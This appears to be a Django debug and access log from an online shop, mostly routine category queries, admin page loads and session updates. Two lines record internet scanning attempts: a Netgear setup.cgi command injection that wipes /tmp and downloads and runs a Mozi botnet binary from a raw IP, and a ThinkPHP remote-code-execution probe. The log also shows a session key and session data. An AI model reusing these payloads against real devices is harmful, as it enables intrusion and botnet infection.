10:38:51,145 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 10:38:51] "GET /api/v1/categories/ HTTP/1.0" 200 178 DEBUG 2019-12-07 10:40:05,310 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:40:05,314 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 10:40:05,316 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 10:40:05] "GET /api/v1/categories/ HTTP/1.0" 200 178 DEBUG 2019-12-07 10:40:05,607 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:40:05,612 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 10:40:05,614 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 10:40:05] "GET /api/v1/categories/ HTTP/1.0" 200 178 [07/Dec/2019 10:44:58] "GET / HTTP/1.0" 302 0 [07/Dec/2019 10:50:04] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 10:55:14,166 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:55:14,170 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 10:55:14,172 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 10:55:14] "GET /api/v1/categories/ HTTP/1.0" 200 178 [07/Dec/2019 10:58:35] "GET / HTTP/1.0" 302 0 [07/Dec/2019 11:05:02] "GET / HTTP/1.0" 302 0 [07/Dec/2019 11:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [07/Dec/2019 11:10:12] "GET / HTTP/1.0" 302 0 [07/Dec/2019 11:20:08] "GET / HTTP/1.0" 302 0 [07/Dec/2019 11:25:11] "GET / HTTP/1.0" 302 0 [07/Dec/2019 11:28:30] "GET / HTTP/1.0" 302 0 [07/Dec/2019 11:31:22] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 11:37:17,647 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 11:37:17,652 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 11:37:17,655 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 11:37:17] "GET /api/v1/categories/ HTTP/1.0" 200 178 DEBUG 2019-12-07 11:37:36,626 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 11:37:36,634 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 11:37:36,638 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 11:37:36] "GET /api/v1/categories/ HTTP/1.0" 200 178 [07/Dec/2019 11:37:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 11:37:52,562 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 11:37:52,568 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 11:37:52,571 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 11:37:52] "GET /api/v1/categories/ HTTP/1.0" 200 178 DEBUG 2019-12-07 11:38:40,054 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 11:38:40,058 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 11:38:40,061 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 11:38:40] "GET /api/v1/categories/ HTTP/1.0" 200 178 [07/Dec/2019 11:43:32] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 11:45:32,291 utils 32196 139885071562496 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 11:45:32,299 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 11:45:32,302 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 11:45:32] "GET /api/v1/categories/ HTTP/1.0" 200 178 [07/Dec/2019 11:48:50] "GET / HTTP/1.0" 302 0 [07/Dec/2019 11:53:52] "GET / HTTP/1.0" 302 0 [07/Dec/2019 11:58:55] "GET / HTTP/1.0" 302 0 [07/Dec/2019 12:02:57] "GET / HTTP/1.0" 302 0 [07/Dec/2019 12:05:02] "GET / HTTP/1.0" 302 0 [07/Dec/2019 12:10:05] "GET / HTTP/1.0" 302 0 Not Found: /setup.cgi [07/Dec/2019 12:13:08] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://1.246.223.116:2518/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 6787 [07/Dec/2019 12:18:51] "GET / HTTP/1.0" 302 0 [07/Dec/2019 12:23:54] "GET / HTTP/1.0" 302 0 [07/Dec/2019 12:28:57] "GET / HTTP/1.0" 302 0 [07/Dec/2019 12:37:31] "GET / HTTP/1.0" 302 0 [07/Dec/2019 12:37:37] "GET / HTTP/1.0" 302 0 [07/Dec/2019 12:42:40] "GET / HTTP/1.0" 302 0 [07/Dec/2019 12:48:25] "GET / HTTP/1.0" 302 0 [07/Dec/2019 12:53:28] "GET / HTTP/1.0" 302 0 Not Found: /index.php [07/Dec/2019 12:55:52] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.0" 404 6737 DEBUG 2019-12-07 12:57:31,521 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 12:57:31,529 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 12:57:31,532 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) DEBUG 2019-12-07 12:57:31,560 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 12:57:31,562 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1000; args=() DEBUG 2019-12-07 12:57:31,579 utils 32196 139885071562496 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T12:57:31.573793+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 12, 57, 31, 573793, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 12:57:31,633 utils 32196 139885071562496 (0.004) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T12:57:31.627914+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 12, 57, 31, 627914, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 12:57:31] "GET /api/v1/categories/ HTTP/1.0" 200 10258 [07/Dec/2019 13:00:02] "GET / HTTP/1.0" 302 0 [07/Dec/2019 13:05:04] "GET / HTTP/1.0" 302 0 [07/Dec/2019 13:10:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:10:28,986 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:10:28,992 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:10:28,994 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 13:10:28] "GET /api/v1/categories/ HTTP/1.0" 200 178 DEBUG 2019-12-07 13:12:30,157 utils 32196 139885071562496 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:12:30.146852+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 12, 30, 146852, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:12:30,162 utils 32196 139885071562496 (0.003) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:12:30,218 utils 32196 139885071562496 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-07 13:12:30,230 utils 32196 139885071562496 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:12:30.227986+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 12, 30, 227986, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:12:30] "GET / HTTP/1.0" 200 8017 [07/Dec/2019 13:12:30] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [07/Dec/2019 13:12:30] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [07/Dec/2019 13:12:30] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 DEBUG 2019-12-07 13:12:31,457 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:12:31.442424+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 12, 31, 442424, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:12:31,461 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:12:31,517 utils 32196 139885061072640 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-07 13:12:31,529 utils 32196 139885061072640 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:12:31.526843+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 12, 31, 526843, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:12:31] "GET / HTTP/1.0" 200 8017 [07/Dec/2019 13:12:31] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [07/Dec/2019 13:12:32] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [07/Dec/2019 13:12:32] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [07/Dec/2019 13:12:32] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [07/Dec/2019 13:12:32] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [07/Dec/2019 13:12:32] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 DEBUG 2019-12-07 13:12:40,928 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:12:40.914020+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 12, 40, 914020, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:12:40,932 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:12:40,979 utils 32196 139885061072640 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-07 13:12:40,988 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:12:40.986468+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 12, 40, 986468, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:12:40] "GET / HTTP/1.0" 200 8017 [07/Dec/2019 13:12:41] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [07/Dec/2019 13:12:41] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [07/Dec/2019 13:12:41] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [07/Dec/2019 13:12:41] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [07/Dec/2019 13:12:42] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 